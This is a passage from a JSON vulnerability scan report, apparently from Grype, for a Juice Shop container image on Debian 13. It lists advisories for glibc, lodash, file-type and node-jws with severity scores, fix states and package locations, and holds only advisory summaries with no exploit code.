Further, they have been deprecated since version 2.34 and should not be used by any new applications. Applications should consider porting away from these interfaces since they may be removed in future versions.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-6238","epss":0.00311,"percentile":0.22586,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-6238","cwe":"CWE-126","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}],"fix":{"versions":[],"state":"wont-fix"},"advisories":[],"risk":0.17882499999999998},"relatedVulnerabilities":[{"id":"CVE-2026-6238","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-6238","namespace":"nvd:cpe","severity":"Medium","urls":["https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u","https://sourceware.org/bugzilla/show_bug.cgi?id=34069"],"description":"The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to validate the RDATA content against the RDATA length in a DNS response when processing LOC, CERT, TKEY or TSIG records, which may allow an attacker to craft a DNS response, causing a target application to crash or read uninitialized memory.\n\nThese functions are for application debugging only and hence not in the path of code executed by the DNS resolver. Further, they have been deprecated since version 2.34 and should not be used by any new applications. Applications should consider porting away from these interfaces since they may be removed in future versions.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-6238","epss":0.00311,"percentile":0.22586,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-6238","cwe":"CWE-126","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-6238","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"GHSA-f23m-r3pf-42rh","dataSource":"https://github.com/advisories/GHSA-f23m-r3pf-42rh","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh","https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg","https://nvd.nist.gov/vuln/detail/CVE-2026-2950"],"description":"lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-2950","epss":0.00297,"percentile":0.21174,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-2950","cwe":"CWE-1321","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}],"fix":{"versions":["4.18.0"],"state":"fixed","available":[{"version":"4.18.0","date":"2026-04-02","kind":"first-observed"}]},"advisories":[],"risk":0.17077499999999998},"relatedVulnerabilities":[{"id":"CVE-2026-2950","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-2950","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"],"description":"Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L","metrics":{"baseScore":6.5,"exploitabilityScore":3.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-2950","epss":0.00297,"percentile":0.21174,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-2950","cwe":"CWE-1321","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"lodash","version":"2.4.2"}},"found":{"vulnerabilityID":"GHSA-f23m-r3pf-42rh","versionConstraint":"<=4.17.23 (semantic)"},"fix":{"suggestedVersion":"4.18.0"}}],"artifact":{"id":"pkg:npm/lodash@2.4.2?package-id=dbbb92a4d9c4d340","name":"lodash","version":"2.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:lodash:lodash:2.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/lodash@2.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-5v7r-6r5c-r473","dataSource":"https://github.com/advisories/GHSA-5v7r-6r5c-r473","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473","https://nvd.nist.gov/vuln/detail/CVE-2026-31808","https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f"],"description":"file-type affected by infinite loop in ASF parser on malformed input with zero-size sub-header","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-31808","epss":0.00325,"percentile":0.24041,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-31808","cwe":"CWE-835","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["21.3.1"],"state":"fixed","available":[{"version":"21.3.1","date":"2026-03-11","kind":"first-observed"}]},"advisories":[],"risk":0.167375},"relatedVulnerabilities":[{"id":"CVE-2026-31808","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-31808","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f","https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473"],"description":"file-type detects the file type of a file, stream, or data. Prior to 21.3.1, a denial of service vulnerability exists in the ASF (WMV/WMA) file type detection parser. When parsing a crafted input where an ASF sub-header has a size field of zero, the parser enters an infinite loop. The payload value becomes negative (-24), causing tokenizer.ignore(payload) to move the read position backwards, so the same sub-header is read repeatedly forever. Any application that uses file-type to detect the type of untrusted/attacker-controlled input is affected. An attacker can stall the Node.js event loop with a 55-byte payload. Fixed in version 21.3.1.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-31808","epss":0.00325,"percentile":0.24041,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-31808","cwe":"CWE-835","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"file-type","version":"16.5.4"}},"found":{"vulnerabilityID":"GHSA-5v7r-6r5c-r473","versionConstraint":">=13.0.0,<21.3.1 (semantic)"},"fix":{"suggestedVersion":"21.3.1"}}],"artifact":{"id":"pkg:npm/file-type@16.5.4?package-id=e880d91c1999c011","name":"file-type","version":"16.5.4","type":"npm","locations":[{"path":"/juice-shop/node_modules/file-type/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:sindresorhus:file-type:16.5.4:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/file-type@16.5.4","upstreams":[]}},{"vulnerability":{"id":"CVE-2019-1010022","dataSource":"https://security-tracker.debian.org/tracker/CVE-2019-1010022","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.","cvss":[],"epss":[{"cve":"CVE-2019-1010022","epss":0.03249,"percentile":0.86681,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-1010022","cwe":"CWE-119","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.16245},"relatedVulnerabilities":[{"id":"CVE-2019-1010022","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010022","namespace":"nvd:cpe","severity":"Critical","urls":["https://security-tracker.debian.org/tracker/CVE-2019-1010022","https://sourceware.org/bugzilla/show_bug.cgi?id=22850","https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3","https://ubuntu.com/security/CVE-2019-1010022"],"description":"GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":9.8,"exploitabilityScore":3.9,"impactScore":5.9},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:P/I:P/A:P","metrics":{"baseScore":7.5,"exploitabilityScore":10,"impactScore":6.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-1010022","epss":0.03249,"percentile":0.86681,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-1010022","cwe":"CWE-119","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2019-1010022","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2019-1010024","dataSource":"https://security-tracker.debian.org/tracker/CVE-2019-1010024","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.","cvss":[],"epss":[{"cve":"CVE-2019-1010024","epss":0.0322,"percentile":0.86555,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-1010024","cwe":"CWE-200","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.161},"relatedVulnerabilities":[{"id":"CVE-2019-1010024","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010024","namespace":"nvd:cpe","severity":"Medium","urls":["http://www.securityfocus.com/bid/109162","https://security-tracker.debian.org/tracker/CVE-2019-1010024","https://sourceware.org/bugzilla/show_bug.cgi?id=22852","https://support.f5.com/csp/article/K06046097","https://support.f5.com/csp/article/K06046097?utm_source=f5support&%3Butm_medium=RSS","https://ubuntu.com/security/CVE-2019-1010024"],"description":"GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:P/I:N/A:N","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-1010024","epss":0.0322,"percentile":0.86555,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-1010024","cwe":"CWE-200","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2019-1010024","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2019-1010023","dataSource":"https://security-tracker.debian.org/tracker/CVE-2019-1010023","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.","cvss":[],"epss":[{"cve":"CVE-2019-1010023","epss":0.03069,"percentile":0.85898,"date":"2026-06-16"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.15345},"relatedVulnerabilities":[{"id":"CVE-2019-1010023","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010023","namespace":"nvd:cpe","severity":"High","urls":["http://www.securityfocus.com/bid/109167","https://security-tracker.debian.org/tracker/CVE-2019-1010023","https://sourceware.org/bugzilla/show_bug.cgi?id=22851","https://support.f5.com/csp/article/K11932200?utm_source=f5support&%3Butm_medium=RSS","https://ubuntu.com/security/CVE-2019-1010023"],"description":"GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.9},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:M/Au:N/C:P/I:P/A:P","metrics":{"baseScore":6.8,"exploitabilityScore":8.6,"impactScore":6.5},"vendorMetadata":{}},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","metrics":{"baseScore":5.4,"exploitabilityScore":2.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-1010023","epss":0.03069,"percentile":0.85898,"date":"2026-06-16"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2019-1010023","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-5435","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-5435","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":7.3,"exploitabilityScore":3.9,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-5435","epss":0.00197,"percentile":0.09559,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-5435","cwe":"CWE-787","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}],"fix":{"versions":[],"state":"wont-fix"},"advisories":[],"risk":0.14578},"relatedVulnerabilities":[{"id":"CVE-2026-5435","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-5435","namespace":"nvd:cpe","severity":"High","urls":["https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u","https://sourceware.org/bugzilla/show_bug.cgi?id=34033"],"description":"The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":7.3,"exploitabilityScore":3.9,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-5435","epss":0.00197,"percentile":0.09559,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-5435","cwe":"CWE-787","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-5435","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"GHSA-869p-cjfg-cm3x","dataSource":"https://github.com/advisories/GHSA-869p-cjfg-cm3x","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x","https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e","https://github.com/auth0/node-jws/commit/4f6e73f24df42f07d632dec6431ade8eda8d11a6","https://github.com/auth0/node-jws/releases/tag/v3.2.3","https://github.com/auth0/node-jws/releases/tag/v4.0.1","https://nvd.nist.gov/vuln/detail/CVE-2025-65945"],"description":"auth0/node-jws Improperly Verifies HMAC Signature","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-65945","epss":0.00193,"percentile":0.09062,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-65945","cwe":"CWE-347","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["3.2.3"],"state":"fixed","available":[{"version":"3.2.3","date":"2025-12-05","kind":"first-observed"}]},"advisories":[],"risk":0.14475},"relatedVulnerabilities":[{"id":"CVE-2025-65945","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2025-65945","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e","https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x"],"description":"auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 